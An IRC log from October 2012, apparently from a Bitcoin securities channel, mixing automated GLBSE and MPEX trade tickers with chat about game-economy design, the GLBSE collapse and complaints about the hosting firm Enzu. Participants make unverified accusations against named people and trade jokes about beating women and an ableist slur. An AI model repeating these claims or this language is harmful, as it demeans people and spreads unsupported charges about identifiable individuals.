03:36:49 [GLBSE] [GIGAMINING] 1 @ 0.6184 BTC [+] Oct 01 03:39:49 [GLBSE] [BITBOND] 1 @ 0.35959999 BTC [+] Oct 01 03:42:09 [GLBSE] [JAH] 1 @ 0.13 BTC [+] Oct 01 03:46:23 [GLBSE] [GSDPT] 50000 @ 0.0034 = 170 BTC [+] Oct 01 03:50:22 http://www.betsofbitco.in/item?id=566 zomg just a few hours Oct 01 03:50:27 i am really excited! Oct 01 03:50:36 dub which one is that ? Oct 01 03:50:45 [GLBSE] [BTC-BOND] 5 @ 0.00989 = 0.0495 BTC [+] Oct 01 03:50:50 onm Oct 01 03:52:51 reminds me of usagi for some reason Oct 01 03:52:59 [GLBSE] [YABMC] 2 @ 0.07898 = 0.158 BTC [+] Oct 01 03:53:06 [GLBSE] [OBSI.HRPT] 1 @ 0.0395 BTC [-] Oct 01 03:53:27 [MPEX] [S.MPOE] 1777 @ 0.0003652 = 0.649 BTC [+] Oct 01 03:53:50 o wow gsdpt Oct 01 03:58:44 [GLBSE] [COGNITIVE] 1 @ 0.5018 BTC [+] Oct 01 04:00:44 [GLBSE] [COGNITIVE] 6 @ 0.50198 = 3.0119 BTC [+] Oct 01 04:00:58 [MPEX] [B.MPCD.A] 12912 @ 0.00100105 = 12.9256 BTC [+] Oct 01 04:02:22 [GLBSE] [COGNITIVE] 21 @ 0.502 = 10.542 BTC [+] Oct 01 04:03:21 [MPEX] [B.MPCD.A] 7088 @ 0.00100105 = 7.0954 BTC [+] Oct 01 04:03:38 [GLBSE] [COGNITIVE] 1 @ 0.5048 BTC [+] Oct 01 04:04:37 [MPEX] [B.MPCD.B] 20000 @ 0.00100157 = 20.0314 BTC [-] Oct 01 04:05:19 [GLBSE] [COGNITIVE] 5 @ 0.505 = 2.525 BTC [+] Oct 01 04:07:23 [GLBSE] [COGNITIVE] 1 @ 0.51878 BTC [+] Oct 01 04:07:59 [GLBSE] [COGNITIVE] 50 @ 0.51898 = 25.949 BTC [+] Oct 01 04:08:43 [GLBSE] [MMM] 1 @ 0.59999999 BTC [-] Oct 01 04:08:45 [GLBSE] [MMM] 1 @ 0.6 BTC [+] Oct 01 04:22:53 nice... the MPCD trading bot that has been putting out unfavorable bid ask spreads for people to pick up didn't realize dividends haven't been paid yet Oct 01 04:24:11 [GLBSE] [ASICMINER] 1 @ 0.10820699 BTC [+] Oct 01 04:29:58 [MPEX] [F.GIGA.ETF] 3700 @ 0.00044186 = 1.6349 BTC [-] Oct 01 04:31:08 I dont like dividends, confusing the prices is just part of why Oct 01 04:32:32 I suppose eventually there will be some kind of meta-client for issuers that will go around to all places they issued some of their shares and handle dividends at that outlet but seems like a lot of added complexity Oct 01 04:33:04 if there were no dividends fictional issues would just carry on infinitely. Oct 01 04:33:55 well yeah but if you consider games fictional then that need not be a bad thing Oct 01 04:34:06 i guess so Oct 01 04:34:19 most of my players seem unlikely to ever sell any shares that provide dividends Oct 01 04:34:22 as they are just free money forever for doing nothing Oct 01 04:34:49 but without dividends, they have to actually sell some to manifest their profits or rwards or capital Oct 01 04:35:03 so more likely to actually find a seller if there are no dividends Oct 01 04:35:47 seriously these are mostly not people really into the forex/stocks/bonds parts of the game, they dont sit there figuring out hey I could sell these shares to buy those other shares Oct 01 04:36:17 instead they just look at their magic money from no-where readout and add to it when they can Oct 01 04:36:50 you need defaults. Oct 01 04:37:29 well I can show them the "nav" type readout too, how much their moneymachine is worth if they sold it Oct 01 04:37:44 if they see that go down they might look inside to see which went down Oct 01 04:38:07 but if its still paying dividends they likely wont care how much it is supposedly worth since they already own it Oct 01 04:38:36 I mean these guys have rooms full of magic swords they never bother to take to a shop to sell, they are hoarders Oct 01 04:38:51 defaults man. look at glbse Oct 01 04:38:59 every week practically there's a default. Oct 01 04:39:06 you mean defaulting on paying divs? Oct 01 04:39:23 or some kind of default that could apply to assets that do not do divs? Oct 01 04:39:28 to all assets. Oct 01 04:39:35 every day there's a chance it goes to shit. Oct 01 04:40:00 so they have to pick the good ones. Oct 01 04:40:24 that sounds like "exchange rates" Oct 01 04:40:49 if they see that Martian BotCoins cost more DeVCoins each all the time they might sell DVC to buy MBC Oct 01 04:40:56 but they dont need dividends for that Oct 01 04:41:46 but look at supposedly "dead" altcoins, you don't see everyone running around trying to sell what they have hoarded of them Oct 01 04:42:05 if a company defaults share = 0 Oct 01 04:42:19 they just don't visit those rooms of their hoard unless they hear the things have started to be valuable again Oct 01 04:42:52 not sure what they defaulted on though? what constitutes a default? Oct 01 04:43:02 the death of the character who is sole owner maybe Oct 01 04:43:28 but if shares are common stock even death of owner surely just means shareholders can elect new board of directors? Oct 01 04:43:44 sounds to me this game economy has serious problems of balance Oct 01 04:43:50 so maybe have stock exchange fees or periodic business license renewals or something Oct 01 04:44:12 so if they fail to pay the fees to stay a live corp they get dissolved Oct 01 04:44:20 [MPEX] [B.MPCD.A] 12000 @ 0.00100035 = 12.0042 BTC [-] Oct 01 04:45:09 some sort of expenses, being that they're businesses. Oct 01 04:45:29 do you mean bankruptcy? if they somehow manage to go into debt (its pretty foolish to let them in the first place, loaner should hold collateral) then failure to pay is the default you are talking about? Oct 01 04:47:22 I had actually considered accounting hosting fees even for un-played nations, thinking maybe anyone who later takes over that population faces those fees, as if its kind of cumulative falling apart of society that new ruler will need to make up for to get full value from the conquered people Oct 01 04:48:22 I was talked out of that though, instead just charge each nation by the "square miles" freeciv records their nation as in control/ownership of Oct 01 04:50:23 the big picture with games requires constantly remembering that no matter how much "assets" there are running around in cycles, ultimately you cannot take more out than you put in Oct 01 04:51:09 thus no matter how stinking rich the whole shebang sounds from its pretty names and numbers, really any "profit" investors stand to gain boils down to only however much players are willing to pay to play Oct 01 04:51:46 unfortunately for some parties though, the distinctions between "player" and "investor" blur, a slippery slope Oct 01 04:52:42 but a big part of my goal has always been to be able to have inestments inside the game that are not, like in EVE online, all invariably scams Oct 01 04:53:18 the game system has to enable characters to be able to actually invest in things that are not, in the game at least, scams Oct 01 04:53:51 it can always be argued that gaming on the whole top down view is itself a scam or that any one or all of the *coins used to play with are, and so on Oct 01 04:54:08 (fiat certain is... ;)) Oct 01 04:54:30 cetainLY is Oct 01 05:00:34 [GLBSE] [ASICMINER] 1 @ 0.10820699 BTC [+] Oct 01 05:00:36 [GLBSE] [ASICMINER] 2 @ 0.108207 = 0.2164 BTC [+] Oct 01 05:00:37 [GLBSE] [ASICMINER] 32 @ 0.1092889 = 3.4972 BTC [+] Oct 01 05:00:38 [GLBSE] [ASICMINER] 15 @ 0.1092899 = 1.6393 BTC [+] Oct 01 05:00:39 [GLBSE] [ASICMINER] 15 @ 0.109594 = 1.6439 BTC [+] Oct 01 05:00:40 [GLBSE] [ASICMINER] 6 @ 0.109595 = 0.6576 BTC [+] Oct 01 05:00:41 [GLBSE] [ASICMINER] 15 @ 0.11 = 1.65 BTC [+] Oct 01 05:01:59 [GLBSE] [ASICMINER] 6 @ 0.11137467 = 0.6682 BTC [+] Oct 01 05:09:45 [MPEX] [S.MPOE] 1000 @ 0.00035833 = 0.3583 BTC [-] Oct 01 05:09:47 [MPEX] [S.MPOE] 4900 @ 0.00035832 = 1.7558 BTC [-] Oct 01 05:09:48 [MPEX] [S.MPOE] 10100 @ 0.00035828 = 3.6186 BTC [-] Oct 01 05:15:24 http://news.slashdot.org/story/12/09/30/2345206/bitcoin-gets-a-futures-market Oct 01 05:16:52 While this sounds intriguing, I'd like to hear a good case for why BitCoin makes sense in this context. Oct 01 05:17:07 does not. Oct 01 05:18:11 I hope they bring back pork bellies Oct 01 05:18:19 cause I was bummed when they took those off the CME Oct 01 05:19:40 im trying ;/ Oct 01 05:21:11 except I'm not in it to trade them Oct 01 05:21:16 I WANNA EAT THEM ALL Oct 01 05:21:29 I only buy pork bellies futures for delivery Oct 01 05:22:15 that's the point Oct 01 05:22:34 futures w/o delivery = some idiot with 50 grams of weed and 20 grams of gold selling shares. Oct 01 05:24:07 well, I don't think most futures traders really want delivery Oct 01 05:24:17 at least not the speculators Oct 01 05:26:31 [GLBSE] [GSDPT] 555 @ 0.00339 = 1.8815 BTC [-] Oct 01 05:27:18 nevertheless. Oct 01 05:29:37 on the internet nobody knows you're http://polimedia.us/dtng/c/src/132481730184.jpg Oct 01 05:30:03 [GLBSE] [ASICMINER] 1 @ 0.11100001 BTC [-] Oct 01 05:32:16 [GLBSE] [COGNITIVE] 2 @ 0.5797 = 1.1594 BTC [+] Oct 01 05:32:16 [GLBSE] [COGNITIVE] 2 @ 0.5798 = 1.1596 BTC [+] Oct 01 05:32:16 [GLBSE] [COGNITIVE] 10 @ 0.58 = 5.8 BTC [+] Oct 01 05:32:16 [GLBSE] [COGNITIVE] 1 @ 0.585 BTC [+] Oct 01 05:32:16 [GLBSE] [COGNITIVE] 2 @ 0.6 = 1.2 BTC [+] Oct 01 05:32:55 [GLBSE] [ASICMINER] 1 @ 0.1124489 BTC [+] Oct 01 05:33:01 [GLBSE] [ASICMINER] 1 @ 0.11100001 BTC [-] Oct 01 05:35:05 [MPEX] [S.MPOE] 14470 @ 0.00036276 = 5.2491 BTC [+] Oct 01 05:35:07 [MPEX] [S.MPOE] 5375 @ 0.00036302 = 1.9512 BTC [+] Oct 01 05:35:23 [GLBSE] [MOORE] 1 @ 0.49889799 BTC [+] Oct 01 05:35:25 [GLBSE] [MOORE] 3 @ 0.498898 = 1.4967 BTC [+] Oct 01 05:35:26 [GLBSE] [MOORE] 3 @ 0.498899 = 1.4967 BTC [+] Oct 01 05:35:27 [GLBSE] [MOORE] 10 @ 0.4988991 = 4.989 BTC [+] Oct 01 05:35:28 [GLBSE] [MOORE] 3 @ 0.4989 = 1.4967 BTC [+] Oct 01 05:35:29 [GLBSE] [MOORE] 10 @ 0.499 = 4.99 BTC [+] Oct 01 05:39:59 [GLBSE] [COGNITIVE] 3 @ 0.601 = 1.803 BTC [+] Oct 01 05:42:25 [GLBSE] [ASICMINER] 1 @ 0.11100001 BTC [-] Oct 01 05:45:36 [GLBSE] [ASICMINER] 1 @ 0.11100001 BTC [-] Oct 01 05:46:12 [GLBSE] [MOORE] 3 @ 0.47999999 = 1.44 BTC [-] **** BEGIN LOGGING AT Mon Oct 1 12:49:04 2012 Oct 01 12:49:54 Diablo-D3 i take it you've seen https://bitcointalk.org/index.php?PHPSESSID=91c9128d117a8258e61427f4d3fc1455&topic=114442.0 ? Oct 01 12:51:36 [GLBSE] [GIGAMINING] 1 @ 0.6182 BTC [-] Oct 01 12:52:48 mircea_popescu: this should be interesting Oct 01 12:53:43 [GLBSE] [GIGAMINING] 1 @ 0.6183 BTC [+] Oct 01 12:54:46 mircea_popescu: photoshop one of those xbox achievement unlocked things Oct 01 12:54:49 "scammer tag" Oct 01 12:55:02 lol Oct 01 13:06:03 [MPEX] [B.MPCD.A] 40000 @ 0.00099999 = 39.9996 BTC [-] Oct 01 13:06:27 [MPEX] [B.MPCD.C] 40000 @ 0.00100046 = 40.0184 BTC [+] Oct 01 13:06:29 [MPEX] [B.MPCD.B] 40000 @ 0.00099998 = 39.9992 BTC [-] Oct 01 13:07:38 [GLBSE] [NYAN.A] 1 @ 0.99 BTC [+] Oct 01 13:12:46 [GLBSE] [BFLS] 9 @ 0.48 = 4.32 BTC [+] Oct 01 13:14:33 [GLBSE] [OBSI.HRPT] 1 @ 0.01500001 BTC [-] Oct 01 13:17:22 hey imsaguy **** BEGIN LOGGING AT Mon Oct 1 13:21:04 2012 Oct 01 13:26:28 [MPEX] [B.MPCD.A] [PAID] 350000 @ 0.00002 = 7 BTC Oct 01 13:26:44 rg: all of them Oct 01 13:27:24 [MPEX] [B.MPCD.B] [PAID] 400000 @ 0.00003 = 12 BTC Oct 01 13:27:44 Diablo-D3: enzu just gave me two faulty disks Oct 01 13:27:45 TWO Oct 01 13:27:47 in the same machine Oct 01 13:28:03 [MPEX] [B.MPCD.C] [PAID] 350000 @ 0.00009268 = 32.43671515 BTC Oct 01 13:28:20 tbh Oct 01 13:28:23 i think you dodged a bullet Oct 01 13:28:24 rg: not my problem Oct 01 13:28:27 yeah I think I did Oct 01 13:28:31 as fucked up as that might seem Oct 01 13:28:34 you mightve Oct 01 13:28:47 I dunno, I just have an entire load of dont give a fuck right now Oct 01 13:28:59 i asked the owner Oct 01 13:29:00 about nenolod Oct 01 13:29:04 he didn't want to talk about it Oct 01 13:29:14 so i can only imagine Oct 01 13:29:16 nenolod quit on him because he refused to quit fucking up Oct 01 13:29:20 he tells me everything usually Oct 01 13:29:39 I dont know who this steve character is, but he sounds like a fucking asshole Oct 01 13:29:46 not the kind of company DMC wants to be doing business with Oct 01 13:29:47 oh yeah Oct 01 13:29:50 steve is the main guy Oct 01 13:29:52 he's in the shadows Oct 01 13:29:57 but i think he's majority owner Oct 01 13:30:06 nick and neno were the frontends Oct 01 13:30:08 steve accidently deleted half of neno's vpses Oct 01 13:30:20 including the atheme and cia.vc ones Oct 01 13:30:23 'accident' Oct 01 13:30:24 see Oct 01 13:30:27 when i terminate customers Oct 01 13:30:31 i usually leave their VMs Oct 01 13:30:33 for up to a month Oct 01 13:30:38 or when people dont pay Oct 01 13:30:46 i still save the data, just in case i get an email like Oct 01 13:30:48 yes, but he managed to alienate every customer ever with that move Oct 01 13:30:48 'omg i was out of town' Oct 01 13:30:53 'you have our main src tree!' Oct 01 13:31:09 cause its actually happened Oct 01 13:31:17 rg: oh, and they want me to pay for my vps now Oct 01 13:31:25 no more professional courtesy for nenolod Oct 01 13:31:33 [MPEX] [S.MPOE] 30238 @ 0.00036223 = 10.9531 BTC [-] Oct 01 13:31:39 their vps are dirt cheap Oct 01 13:31:49 do you need a bitvps Oct 01 13:31:49 still aint paying for one Oct 01 13:32:05 ill give you a free vps Oct 01 13:32:13 a small one but it will be free Oct 01 13:32:16 I wanna see what nenolod does Oct 01 13:32:26 he'll either start his own place Oct 01 13:32:28 or go work for smeone Oct 01 13:32:41 he's still flush with cash Oct 01 13:32:44 so he could do anything Oct 01 13:32:56 hes interested in the DMC plan, surprisingly Oct 01 13:33:03 he probably got like 100k from his vps company Oct 01 13:33:15 and monthly divs Oct 01 13:33:31 steve is an asshole Oct 01 13:33:34 hes the one who complains when i get deals Oct 01 13:33:35 I dunno, maybe Ill go work for nenolod for a change Oct 01 13:33:54 he was complaining that i didn't get charged for these two disks Oct 01 13:34:03 its a $45 charge to get two disks installed Oct 01 13:34:05 i was like yeah Oct 01 13:34:07 im not pying that Oct 01 13:34:10 you took 3 days to do it Oct 01 13:35:37 what's with gox volume Oct 01 13:35:40 10k a day nao ?! Oct 01 13:36:04 8 weeks til block half!!! Oct 01 13:36:08 [GLBSE] [NASTY] 4 @ 0.45899999 = 1.836 BTC [+] Oct 01 13:36:23 my litecoin pool is LIGHTING it up Oct 01 13:36:43 i did over 700 LTC the other day Oct 01 13:36:47 lol cool Oct 01 13:36:49 that's like 200 over average Oct 01 13:36:55 for my rate Oct 01 13:46:09 the returns on OBSI.HRPT became disappointing. Oct 01 13:46:31 obsi is closing all of his assets and buying everything back Oct 01 13:46:38 blame nefario Oct 01 13:47:08 oh, so *you* are the reason i quit making decent BTC per day Oct 01 13:47:11 thanks Diablo-D3 Oct 01 13:47:19 no, nefario is attacking everyone Oct 01 13:47:24 he delisted all of goat's assets Oct 01 13:47:41 whoever that is Oct 01 13:47:53 large miner and also ran a pirate passthrough Oct 01 13:47:57 all i know is Oct 01 13:48:07 DMC went to shit Oct 01 13:48:13 and then my OBSI.HRPT went to shit Oct 01 13:48:17 yup, you can thank nefario for all of that Oct 01 13:48:20 thusly i am blaming you Oct 01 13:48:30 no one asked him to lock DMC's account and fuck over the market Oct 01 13:48:36 nenolod http://polimedia.us/dtng/c/src/134654389322.png Oct 01 13:49:14 yeah seems about right Oct 01 13:49:34 myeah. Oct 01 13:50:39 i wonder which is more reliable Oct 01 13:50:42 GLBSE Oct 01 13:50:45 or HDDs from Enzu Oct 01 13:50:52 rg: ^^^^ Oct 01 13:50:59 thats a tough call >_> Oct 01 13:51:13 nenolod: anyhow, I repurchased almost half of the DMC shares out there Oct 01 13:52:04 Im probably going to keep repurchasing them until nefario pulls his head out of his ass Oct 01 13:52:21 Diablo-D3 if you rebuy the entire lot that'll prolly be the best closure for dmc. Oct 01 13:52:31 mircea_popescu: that'll take awhile Oct 01 13:52:40 didn't you say you bought half ? Oct 01 13:52:46 yes Oct 01 13:53:00 well so. Oct 01 13:53:07 did it using the obsi.abmo money Oct 01 13:53:23 so splurge a little. Oct 01 13:53:47 think about it this way : if anyone bought at ipo 1 btc and sold at .05 or w/e, they took a 95 btc loss per 100 shares Oct 01 13:54:00 if you put in 100 btc of your own money that won't hurt anything. Oct 01 13:54:08 Active Devices : 2 Oct 01 13:54:08 Working Devices : 0 Oct 01 13:54:08 Failed Devices : 2 Oct 01 13:54:09 Spare Devices : 0 Oct 01 13:54:14 and where do I GET 100btc of my own money? Oct 01 13:54:20 rg: soooo glad my shit runs in a ramdisk Oct 01 13:54:29 100 BTC is only like $1200 Oct 01 13:54:35 Luceo: exactly Oct 01 13:54:38 Diablo-D3 that's a question for the ages. Oct 01 13:54:40 thats money I dont have Oct 01 13:54:45 i lost like Oct 01 13:54:48 Ouch :( Oct 01 13:54:48 same place kludge does i guess Oct 01 13:54:50 500 BTC Oct 01 13:54:55 playing GLBSE Oct 01 13:54:56 nenolod: on what? Oct 01 13:54:58 lol Oct 01 13:55:00 thats lame =/ Oct 01 13:55:02 nenolod sucks. then again, glbse has lost people more than pirate Oct 01 13:55:03 [GLBSE] [OBSI.HRPT] 1 @ 0.02069624 BTC [+] Oct 01 13:55:04 over the years. Oct 01 13:55:06 I lost over 500 BTC on pirate :/ Oct 01 13:55:07 i think it would have been better spent playing Dragon's Tale. Oct 01 13:55:11 I dont trust nefario with anything anymore Oct 01 13:55:18 he just fucks up anything he touches Oct 01 13:55:20 Diablo-D3 nobody does, pretty much. Oct 01 13:55:26 including DMC Oct 01 13:55:29 or perhaps getting e-tail on secondlife Oct 01 13:55:48 I think if I ever start another company, Im only going to take money from professional VCs. Oct 01 13:55:50 nenolod why not brave up and get irl tail ? Oct 01 13:55:54 at least they arent fucktards and know how the game is played Oct 01 13:55:54 for 500 btc you can have a bunch. Oct 01 13:56:00 mircea_popescu: been there, done that Oct 01 13:56:04 Diablo-D3 hahaha right. Oct 01 13:56:04 mircea_popescu: he has that sitting like 5 feet from him Oct 01 13:56:12 mircea_popescu: but that involves currency exchanges Oct 01 13:56:32 just give her cascucisocosacacuricocosuco wtf his name is coins Oct 01 13:56:35 [MPEX] [S.MPOE] 8362 @ 0.00036223 = 3.029 BTC [-] Oct 01 13:56:37 [MPEX] [S.MPOE] 37568 @ 0.00036015 = 13.5301 BTC [-] Oct 01 13:56:42 mircea_popescu fails at roman names. Oct 01 13:56:50 was it cuntclicker ? Oct 01 13:57:22 says the guy that blogs about beating women with a stick Oct 01 13:57:30 wow Oct 01 13:57:34 i also beat them with a chain. Oct 01 13:57:36 he truly is romanian! Oct 01 13:57:49 anyway Oct 01 13:57:57 glbse is a scam Oct 01 13:58:06 which is too bad Oct 01 13:58:08 cause i was like Oct 01 13:58:14 gonna dump way more than 500 BTC in it Oct 01 13:58:21 WAY more Oct 01 13:58:28 nenolod: yes, glbse is a scam and it scammed my investors out of every dime and it scammed me out of a company. Oct 01 13:58:33 hey look its neno Oct 01 13:58:40 shut up your company wasn't incorporated in maine Oct 01 13:58:40 nenolod: lol i used those 2TB disks again Oct 01 13:58:44 so none of that was legal Oct 01 13:58:48 nenolod mpex. Oct 01 13:58:56 both defective Oct 01 13:59:05 rg: i don't work at enzu anymore Oct 01 13:59:09 i know Oct 01 13:59:15 im har haring with you Oct 01 13:59:18 rg: i'm not unhappy about that Oct 01 13:59:18 about shitty hardware Oct 01 13:59:18 :D Oct 01 13:59:19 they have Oct 01 13:59:41 they have a support guy now Oct 01 13:59:43 his last name is Kumar Oct 01 13:59:46 what Oct 01 13:59:50 Omar Kumar ? Oct 01 13:59:55 no i forget his first name Oct 01 13:59:57 they already fired Roy and Travis? Oct 01 14:00:00 its just funny cause its kumar Oct 01 14:00:04 harold and kumar Oct 01 14:00:18 Sticky Kumar Oct 01 14:00:44 i dont know what im going to do Oct 01 14:00:48 i need 4TB in this server Oct 01 14:00:49 jack off ? Oct 01 14:00:51 rg: i walked away from enzu after their support lead guy said i was a "level 2 tech" and yet i spent my time doing /his/ job, as well as my own Oct 01 14:00:55 and this stupid i7 only has 2 hd slots Oct 01 14:01:11 umm Oct 01 14:01:15 i thougt you were the lead support Oct 01 14:01:22 rg: no they spliced in more management Oct 01 14:01:29 rg: because, management is always the solution! Oct 01 14:01:33 lets just blame it on steve Oct 01 14:01:36 even if he didn't do it Oct 01 14:01:37 hes a dick Oct 01 14:01:42 steve has assburgers syndrome Oct 01 14:01:50 seriously Oct 01 14:01:51 dude Oct 01 14:01:53 he left me hanging Oct 01 14:01:53 that wouldn ot surprise me Oct 01 14:01:54 at all Oct 01 14:01:55 on so much shit Oct 01 14:01:57 infact Oct 01 14:01:59 he is like Oct 01 14:02:00 it would explain a lot Oct 01 14:02:02 "go talk to PCCW" Oct 01 14:02:11 "we need to get 1gbit of PCCW on 10gbit link" Oct 01 14:02:26 how are you meant to do that Oct 01 14:02:29 ok we can do that at $1/mbit and have it installed tomorrow, we just need your CEO to sign off Oct 01 14:02:30 you're not authorized to buy Oct 01 14:02:35 exactly Oct 01 14:02:50 "actually we need something else, ask them if they can do something else" Oct 01 14:03:13 i mean i worked leads that i will not be able to work anymore because i got burned Oct 01 14:03:17 thanks steve! Oct 01 14:04:12 rg: i am just wondering when the rapidxen brand necrophilia will start Oct 01 14:04:39 yeah Oct 01 14:04:45 i decided not to get any more boxes from enzu Oct 01 14:04:45 the funny thing about steve is Oct 01 14:04:52 i have a few that will need to be maintained Oct 01 14:04:54 when you prove that he contradicted himself Oct 01 14:04:54 but other than that Oct 01 14:04:56 im going with Alec Oct 01 14:05:04 he stops talking Oct 01 14:05:06 (from wht) Oct 01 14:05:12 i am out of hosting Oct 01 14:05:17 yay for being out of hosting Oct 01 14:05:18 Alec knows that you need staff Oct 01 14:05:20 hes no guru Oct 01 14:05:23 but he has proper staff Oct 01 14:05:36 things he cant do.. he has people to do Oct 01 14:05:40 and that's what enzu doesnt have Oct 01 14:05:51 nenolod going full time on wikipedia ? Oct 01 14:06:00 rg: things were going great when steve shut up and let me do my job Oct 01 14:06:03 nick is kinda patronizing sometimes Oct 01 14:06:10 hes like asking me to prove the disks are faulty Oct 01 14:06:12 im like dude Oct 01 14:06:19 its from a batch of disks we KNOW were defective Oct 01 14:06:24 why do i need to show you systme logs Oct 01 14:06:29 [GLBSE] [FDBF] 12 @ 0.149253 = 1.791 BTC [+] Oct 01 14:06:31 rg: i got some pretty cool things going on at enzu for a little while anyway Oct 01 14:06:37 well Oct 01 14:06:39 you saved my ass Oct 01 14:06:40 kinda Oct 01 14:06:54 i mean, you ruined my raid array Oct 01 14:06:57 but it wasnt too bad Oct 01 14:07:06 coulda been worse Oct 01 14:07:13 i didn't do any permanent damage to it Oct 01 14:07:20 and that wasn't my fault, actually Oct 01 14:07:25 the stupid webbios crap fucked me Oct 01 14:07:34 well Oct 01 14:07:42 you finally handed the box bac over to me Oct 01 14:07:45 and i got what i needed Oct 01 14:07:50 at least you knew when to give it over Oct 01 14:07:59 yes Oct 01 14:08:07 and steve was shouting in my ear saying "don't do that!" Oct 01 14:08:16 i am like "fuck you, i'm doing that, fire me if you want" Oct 01 14:08:23 yeah Oct 01 14:08:24 steve hates me Oct 01 14:08:29 but i dont give a shit Oct 01 14:08:31 [MPEX] [B.MPCD.A] 45616 @ 0.00100002 = 45.6169 BTC [+] Oct 01 14:08:32 the service he provides is shit Oct 01 14:08:40 rg: he invoiced me Oct 01 14:08:45 rg: for rapidxen vps Oct 01 14:08:49 rg: i am like "lol" Oct 01 14:08:57 hahaha Oct 01 14:09:00 oh man Oct 01 14:09:02 what an asshole Oct 01 14:09:07 hahah Oct 01 14:09:09 he would Oct 01 14:09:28 i probably shouldn't talk shit about enzu until this rsync finishes Oct 01 14:09:31 if it finishes Oct 01 14:09:34 since my raid is FUCKED Oct 01 14:09:41 great HDDs Oct 01 14:09:59 i guess i won't have to worry about running kash(1) on this machine Oct 01 14:10:14 those RE3's havent failed yet Oct 01 14:10:17 so that's good Oct 01 14:10:17 since i could just see steve as the type of guy Oct 01 14:10:23 who would take a tromp through my dedi Oct 01 14:10:26 theyre pretty slow Oct 01 14:10:34 to see if he could steal any of my own IP Oct 01 14:10:52 you know what we should do Oct 01 14:10:54 with your rapidxen money Oct 01 14:10:57 flip houses Oct 01 14:11:00 and make a tv show about it Oct 01 14:11:08 be all like Oct 01 14:11:11 vanilla ice up in this shit Oct 01 14:11:13 ? Oct 01 14:11:13 'two beginners, flush with cash, take the housing market by STORM' Oct 01 14:11:24 and we script in mistakes Oct 01 14:11:27 and make it a learning thing Oct 01 14:11:29 not even kidding... http://www.diynetwork.com/the-vanilla-ice-project/show/index.html Oct 01 14:11:32 script in mistakes Oct 01 14:11:33 heh Oct 01 14:11:40 "OH SHIT, THAT WAS AN ENZU-GRADE FUCK UP THERE" Oct 01 14:11:49 so wait Oct 01 14:11:51 "BY THE WAY NEVER GO WITH ENZU FOR HOSTING THEY WILL DO THIS WITH YOUR SERVER LOLOLOLOL" Oct 01 14:11:51 rewind Oct 01 14:11:53 aw Oct 01 14:11:55 he stole our idea Oct 01 14:12:04 steve is basically a kash-grade ceo Oct 01 14:12:25 [06:58:39] shut up your company wasn't incorporated in maine Oct 01 14:12:32 it would have been, though Oct 01 14:12:39 rg: in my 13 year old career of doing this, i've worked from everyone from stallman to phillip rosedale, and i have yet to meet anyone as fucked up in the head as CEO as steve is Oct 01 14:12:43 we're incorporated in Florida Oct 01 14:12:46 not cause grubles lives there Oct 01 14:12:49 cause it was the cheapest Oct 01 14:12:59 oklahoma is like 100 bux Oct 01 14:13:04 you just say Oct 01 14:13:07 yeah we paid like $80 for fl Oct 01 14:13:08 "i want to start a company" Oct 01 14:13:10 they are like Oct 01 14:13:12 "$100 please" Oct 01 14:13:12 maine isnt cheap Oct 01 14:13:16 i think delaware is the cheapest Oct 01 14:13:19 no Oct 01 14:13:21 deleware isnt Oct 01 14:13:22 but at least the tax money would stay in maine Oct 01 14:13:29 i think i paid like 150 but it included a bunch of trims Oct 01 14:13:41 lots of people do delaware Oct 01 14:13:45 i think it looks sketchy Oct 01 14:13:46 oklahoma lets you create bullshit legal entities Oct 01 14:13:51 for $50 Oct 01 14:13:53 if i did just registration it would have been like 70 or something i think Oct 01 14:13:56 it is great Oct 01 14:14:01 o, really ? Oct 01 14:14:08 i wonder what ever happened with my better business burea complaint Oct 01 14:14:19 i responded to the guy Oct 01 14:14:21 enzu has an F rating with BBB Oct 01 14:14:21 rg it will be handled professionally and fairly Oct 01 14:14:22 lulz Oct 01 14:14:22 in 2021 Oct 01 14:14:34 this guy claimed the enzu dc wasnt in california Oct 01 14:14:35 at all Oct 01 14:14:38 and that it was in nevada Oct 01 14:14:42 enzu has more than one dc Oct 01 14:14:46 and because of that, he should get a 2 month refund Oct 01 14:14:55 diablo-d3: this box was in california Oct 01 14:15:01 [GLBSE] [GIGAMINING] 3 @ 0.6 = 1.8 BTC [-] Oct 01 14:15:13 he never complained once in two months Oct 01 14:15:17 then he didn't pay his bill on time Oct 01 14:15:19 yeah fuck him Oct 01 14:15:27 so i was like wtf Oct 01 14:15:31 the dc is in 530 w 6th Oct 01 14:15:38 yeah Oct 01 14:15:39 i've seen steve's fibres in the MMR before Oct 01 14:15:39 same as webnx Oct 01 14:15:45 before even working for enzu Oct 01 14:16:04 im pretty sure the BBB discarded the complaint Oct 01 14:16:05 lets see Oct 01 14:16:08 maybe i can find the url Oct 01 14:16:40 ok let me reiterate Oct 01 14:16:50 i worked with the guy who invented fucking Mork Oct 01 14:16:51 Case ADMINISTRATIVELY CLOSED (More) Oct 01 14:16:54 owned. Oct 01 14:17:20 and steve is more crazy than that guy Oct 01 14:17:37 and that guy is bonafide crazy has multiple personalities which fucking debate each other on IRC Oct 01 14:17:43 and steve is more crazy than that guy Oct 01 14:17:46 seriously. Oct 01 14:17:56 the guy is all over the place Oct 01 14:17:58 has anyone even seen nefario lately, btw? Oct 01 14:18:11 arf Oct 01 14:18:14 our BBB rating isnt great Oct 01 14:18:21 F- Oct 01 14:18:22 got it Oct 01 14:18:23 its a B- Oct 01 14:18:24 BBB is a scam anyhow Oct 01 14:18:27 F-! Oct 01 14:18:36 http://www.bbb.org/central-florida/business-reviews/computers-hardware-software-and-services/bitvpscom-in-lakeland-fl-90168487 Oct 01 14:18:38 I think all companies should boycott it Oct 01 14:18:46 [GLBSE] [BBBB] 119 @ 0.000128 = 0.0152 BTC [-] Oct 01 14:18:46 yeah we werent even signed up for it Oct 01 14:18:49 when i got it i was like wtf? Oct 01 14:18:51 its a private company that is paid by its members to protect companies Oct 01 14:18:54 rg: yeah Oct 01 14:18:58 and you can sue them for that too Oct 01 14:19:08 im a gentleman Oct 01 14:19:11 you are not a customer and it damages your company's reputation to be associated with them Oct 01 14:19:12 i dont go suing people Oct 01 14:19:58 BBB found business made good faith effort to resolve complaint but customer not satisfied with business response Oct 01 14:20:05 haa Oct 01 14:20:09 +1 BitVPS Oct 01 14:20:16 let me translate Oct 01 14:20:22 [MPEX] [S.DICE] 15295 @ 0.0034 = 52.003 BTC [+] Oct 01 14:20:23 "BitVPS did what they were supposed to and the customer was an asshole' Oct 01 14:20:38 http://porn.serverbear.com/ Oct 01 14:20:39 wat Oct 01 14:21:01 serverbear is such a joke Oct 01 14:21:08 >steadfast networks Oct 01 14:21:10 >1tb of ssd Oct 01 14:21:18 enzu is in steadfast now Oct 01 